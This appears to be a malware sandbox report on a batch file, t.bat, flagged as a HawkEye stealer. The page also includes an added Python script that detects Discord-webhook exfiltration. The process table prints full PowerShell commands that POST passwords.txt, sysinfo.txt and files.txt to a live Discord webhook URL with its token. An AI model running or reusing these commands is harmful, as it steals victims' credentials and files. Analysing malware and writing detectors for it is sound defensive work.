Analysis Overview
SHA256
3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978
Threat Level: Known bad
The file t.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-11-13 21:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-13 21:21
Reported
2023-11-13 21:23
Platform
win10v2004-20231020-en
Max time kernel
74s
Max time network
69s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3308 wrote to memory of 1040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 1040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe |
| PID 3308 wrote to memory of 3736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe |
| PID 3308 wrote to memory of 3948 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3948 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
| Process | Command line |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content passwords.txt)}" |
| C:\Windows\system32\systeminfo.exe | systeminfo |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content sysinfo.txt)}" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content files.txt)}" |
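The process tree and exfiltration pattern recorded above, worked as an added Python example that is not part of the sandbox report. It rebuilds the parent/child map from the "wrote to memory of" rows (in this report every cmd.exe write goes to one of the four children it spawns, the usual footprint of process creation rather than injection) and flags any child whose command line POSTs a local file to a Discord webhook. The rows, PIDs, images and command lines are constructed to mirror the report; the webhook ID and token are placeholders, not the ones on the page, and the regexes are the editor's, not the sandbox's signatures.

```python
import re
from collections import defaultdict

# Canonical Discord webhook URL; captures the numeric ID (a snowflake) and
# the secret token separately so the token can be redacted from output.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/"
    r"(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]{50,})"
)
# PowerShell HTTP cmdlets and their built-in aliases, a POST, and an inline file read.
REQUEST_RE = re.compile(r"\b(?:Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget)\b", re.I)
POST_RE = re.compile(r"-Method\s+POST\b", re.I)
READ_FILE_RE = re.compile(r"\b(?:Get-Content|gc|cat|type)\s+(?P<file>[^\s)\"']+)", re.I)
# Shape of the report's "Suspicious use of WriteProcessMemory" descriptions.
WPM_RE = re.compile(r"PID\s+(?P<parent>\d+)\s+wrote to memory of\s+(?P<child>\d+)")

# Constructed input mirroring the report: same PIDs and images, but a
# placeholder webhook ID/token instead of the one on the page.
FAKE_WEBHOOK = "https://discord.com/api/webhooks/111111111111111111/" + "A" * 68


def ps_post(path):
    """Build the PowerShell one-liner pattern seen in the report for a given file."""
    return ('powershell -Command "Invoke-WebRequest -Uri \'%s\' -Method POST '
            '-Body @{content=(Get-Content %s)}"' % (FAKE_WEBHOOK, path))


WPM_ROWS = [f"PID 3308 wrote to memory of {c}"
            for c in (1040, 1040, 3736, 3736, 3948, 3948, 3916, 3916)]
PROCESSES = [
    (3308, r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"'),
    (1040, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps_post("passwords.txt")),
    (3736, r"C:\Windows\system32\systeminfo.exe", "systeminfo"),
    (3948, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps_post("sysinfo.txt")),
    (3916, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps_post("files.txt")),
]


def parse_wpm_rows(rows):
    """parent PID -> sorted, de-duplicated child PIDs (the report logs two writes per spawn)."""
    tree = defaultdict(set)
    for row in rows:
        m = WPM_RE.search(row)
        if m:
            tree[int(m["parent"])].add(int(m["child"]))
    return {parent: sorted(kids) for parent, kids in tree.items()}


def find_webhook_exfil(cmdline):
    """Return details if a command line POSTs a local file to a Discord webhook, else None."""
    wh = WEBHOOK_RE.search(cmdline)
    if not (wh and REQUEST_RE.search(cmdline) and POST_RE.search(cmdline)):
        return None
    rf = READ_FILE_RE.search(cmdline)
    return {
        "webhook_id": wh["id"],
        "token_len": len(wh["token"]),  # the token is a credential; record only its length
        "file": rf["file"] if rf else None,
    }


def analyze(wpm_rows, processes):
    """Join the parent/child map with command lines; one finding per exfiltrating child."""
    parent_of = {c: p for p, kids in parse_wpm_rows(wpm_rows).items() for c in kids}
    findings = []
    for pid, image, cmdline in processes:
        hit = find_webhook_exfil(cmdline)
        if hit:
            findings.append({"pid": pid, "parent": parent_of.get(pid), "image": image, **hit})
    return findings


if __name__ == "__main__":
    for f in analyze(WPM_ROWS, PROCESSES):
        print(f"pid {f['pid']} (parent {f['parent']}) sends {f['file']} "
              f"to webhook {f['webhook_id']}")
```

The webhook ID is the indicator worth matching in proxy logs and reporting to Discord; the token is the attacker's credential for that webhook, which is why the script keeps only its length rather than copying the full URL into findings. Of the Network rows that follow, only discord.com is referenced by any command line on the page; the bing.net and in-addr.arpa entries are not tied to any process the report lists.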
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 8.144.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.109.26.67.in-addr.arpa | udp |
Files
memory/1040-11-0x000002D359AE0000-0x000002D359B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejj2rgeb.ncq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1040-16-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp
memory/1040-17-0x000002D341360000-0x000002D341370000-memory.dmp
memory/1040-18-0x000002D341360000-0x000002D341370000-memory.dmp
memory/1040-19-0x000002D341360000-0x000002D341370000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\passwords.txt
| MD5 | 53b0ead48140091a196fafb6b8c5bb3c |
| SHA1 | c6862512054f2de22087bfe539b9fa18e97db214 |
| SHA256 | 57a3befee8f64369c40dfe1fb0b6df5792c8b68381e60d786b7432fb2a3cf662 |
| SHA512 | 4f8e6514ea92ab08d950d2a00448f5f08f46d48112c632e0fcc504f7ea232b08f49db505751d949064df13a20a50e149034b78a17f45cd308fec1e472f7301cb |
memory/1040-21-0x000002D35A740000-0x000002D35AEE6000-memory.dmp
memory/1040-25-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8a7f1bbb54d46317b10f8570930f1587 |
| SHA1 | a3622cd5ba47ff63381e1c8459dcdb822ae80b14 |
| SHA256 | 19409fcc9d229fdc1fa59eb1b3beea2e031a76782261e3fdd0af6639f7111cac |
| SHA512 | 9c8c56c205ed32589c9ce80f10fe11986f238a722b3016e50e7677d60f190c7abe2fe445a9bdf2d192d8a9ab4f2e29528d5e179b2dca0c83668c3932858488c4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d2dcde2b92ddc1caedbe3dcc9efc114 |
| SHA1 | e149ab0853f59539a6993d1727e7f29834c3a548 |
| SHA256 | 3c598ecbf86eb6c3f992e35bbcd69e354cfb1f9caf0c436cd7acabac111d96c6 |
| SHA512 | 662fd6ec00495373f8fbe821badaacf0c35e27243fd2d640e908ef913a0725f92f2379fc34d42653930463425cd8a290c8981cb658e155f10bc928ce84201ba4 |
memory/3948-38-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3948-40-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp
memory/3948-39-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | a9812d5ea5001324a17895f4ec2bb47c |
| SHA1 | 054e0b9eedcb1264ace23dbf239818244fdafb4f |
| SHA256 | 8907893d54ea7f5fea57bbca52fdde5d14b6517a0b8e745d78758667b469ae5e |
| SHA512 | 2677628779d1766bb84a736034cf8bbf0bd464adcadf41d1e94b5abfa0174aa7eb3a50d8a93748f7b55378df6ed13fed0cb2ea50d69736faeb146faf6f74c559 |
memory/3948-44-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3916-55-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3916-57-0x0000025177D90000-0x0000025177DA0000-memory.dmp
memory/3916-56-0x0000025177D90000-0x0000025177DA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 87addc59846b16b4a3c182e16ace9b84 |
| SHA1 | 572ba04171b1f9d893f43f8c72800393b133161a |
| SHA256 | abcdce53e9e05fd1009fa1a97af43f4471b3a408af5e51a1e5baa091a36ae5f0 |
| SHA512 | b5f2214bf9fe99cb9a6eda901b102bb46c9843a398d72154ff6943cec2d53defa9e7026002f80c29ea1ad0de5864aae91e8cb2b9a0426842d0d6299b87d2f18e |
C:\Users\Admin\AppData\Local\Temp\files.txt
| MD5 | f31c3f34c03c7016c72b9355e02bceeb |
| SHA1 | 79ecb50628fef47b8b4518e624de4b241011da32 |
| SHA256 | ab9afd4963e85b01ab48cd37e7ebec4c3e496640a72976e5ec5529f5b92b1f8d |
| SHA512 | abf53be628382272dbb0e75085e36ac1cc0d8c215ac4a27b2d1fe1e8647df03feaa60486a3068eae0d54c1d61256293536f59f335fe4ed55ce479aa5d9ddd679 |
memory/3916-62-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp